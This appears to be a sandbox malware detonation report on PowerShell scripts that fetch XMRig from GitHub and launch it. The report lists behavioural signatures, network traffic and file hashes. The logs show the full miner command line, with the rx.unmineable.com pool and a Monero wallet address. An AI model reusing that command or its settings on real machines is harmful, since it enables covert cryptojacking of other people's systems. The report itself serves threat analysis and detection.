| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win7-20240221-en
Max time kernel
122s
Max time network
127s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
Network
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
292s
Max time network
290s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1636 wrote to memory of 1000 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1636 wrote to memory of 1000 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_30xtwvwv.ffc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
299s
Max time network
302s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 19 hits; the report records no description, indicator, process or target for any of them | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5116 wrote to memory of 3784 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5116 wrote to memory of 3784 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.17.178.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
Files
memory/5116-4-0x00007FFE943D3000-0x00007FFE943D4000-memory.dmp
memory/5116-5-0x000001EA34810000-0x000001EA34832000-memory.dmp
memory/5116-8-0x000001EA4CFB0000-0x000001EA4D026000-memory.dmp
memory/5116-9-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lrbz3tpv.zel.ps1 (written by PowerShell itself at start-up to test whether an AppLocker/WDAC script policy is enforced; not a dropped payload. Its hashes are those of the one-byte content "1".)
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/5116-10-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp
memory/5116-25-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp
memory/5116-29-0x00007FFE943D3000-0x00007FFE943D4000-memory.dmp
memory/5116-30-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp
memory/5116-31-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp
memory/5116-64-0x000001EA4CE00000-0x000001EA4CE0A000-memory.dmp
memory/5116-51-0x000001EA4CE20000-0x000001EA4CE32000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3784-93-0x000001CA748A0000-0x000001CA748C0000-memory.dmp
memory/3784-94-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-95-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-96-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-97-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-98-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-99-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-100-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-101-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-102-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-103-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-104-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-105-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-106-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-107-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-108-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-109-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-110-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-111-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-112-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-113-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-114-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-115-0x00007FF638230000-0x00007FF638E63000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
296s
Max time network
298s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 24 hits; the report records no description, indicator, process or target for any of them | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4904 wrote to memory of 2300 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4904 wrote to memory of 2300 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
Files
memory/4904-3-0x00007FFFD3123000-0x00007FFFD3124000-memory.dmp
memory/4904-5-0x0000021D77E10000-0x0000021D77E32000-memory.dmp
memory/4904-8-0x00007FFFD3120000-0x00007FFFD3B0C000-memory.dmp
memory/4904-9-0x0000021D77F40000-0x0000021D77FB6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bwpe1v3s.5xm.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4904-10-0x00007FFFD3120000-0x00007FFFD3B0C000-memory.dmp
memory/4904-25-0x00007FFFD3120000-0x00007FFFD3B0C000-memory.dmp
memory/4904-29-0x00007FFFD3123000-0x00007FFFD3124000-memory.dmp
memory/4904-30-0x00007FFFD3120000-0x00007FFFD3B0C000-memory.dmp
memory/4904-31-0x00007FFFD3120000-0x00007FFFD3B0C000-memory.dmp
memory/4904-32-0x00007FFFD3120000-0x00007FFFD3B0C000-memory.dmp
memory/4904-65-0x0000021D779C0000-0x0000021D779CA000-memory.dmp
memory/4904-52-0x0000021D779E0000-0x0000021D779F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2300-94-0x00000297502A0000-0x00000297502C0000-memory.dmp
memory/2300-95-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-96-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-97-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-98-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-99-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-100-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-101-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-102-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-103-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-104-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-105-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-106-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-107-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-108-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-109-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-110-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-111-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-112-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-113-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-114-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-115-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-116-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-117-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-118-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
295s
Max time network
295s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 27 hits; the report records no description, indicator, process or target for any of them | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2620 wrote to memory of 4912 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2620 wrote to memory of 4912 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.121:443 | www.bing.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| NL | 23.62.61.121:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
Files
memory/2620-0-0x00007FFA71593000-0x00007FFA71595000-memory.dmp
memory/2620-6-0x000002957D860000-0x000002957D882000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4djhohuh.4pu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2620-11-0x00007FFA71590000-0x00007FFA72051000-memory.dmp
memory/2620-12-0x00007FFA71590000-0x00007FFA72051000-memory.dmp
memory/2620-13-0x00007FFA71590000-0x00007FFA72051000-memory.dmp
memory/2620-14-0x00007FFA71593000-0x00007FFA71595000-memory.dmp
memory/2620-15-0x00007FFA71590000-0x00007FFA72051000-memory.dmp
memory/2620-17-0x00007FFA71590000-0x00007FFA72051000-memory.dmp
memory/2620-18-0x000002957DD50000-0x000002957DD62000-memory.dmp
memory/2620-19-0x000002957DD10000-0x000002957DD1A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4912-50-0x00000153FA490000-0x00000153FA4B0000-memory.dmp
memory/4912-51-0x00000153FBE90000-0x00000153FBEB0000-memory.dmp
memory/4912-52-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-53-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-54-0x00000153FBEB0000-0x00000153FBED0000-memory.dmp
memory/4912-55-0x00000153FBED0000-0x00000153FBEF0000-memory.dmp
memory/4912-56-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/2620-57-0x00007FFA71590000-0x00007FFA72051000-memory.dmp
memory/4912-58-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-59-0x00000153FBEB0000-0x00000153FBED0000-memory.dmp
memory/4912-60-0x00000153FBED0000-0x00000153FBEF0000-memory.dmp
memory/4912-61-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-62-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-63-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-64-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-65-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-66-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-67-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-68-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-69-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-70-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-71-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-72-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-73-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-74-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-75-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-76-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-77-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-78-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-79-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
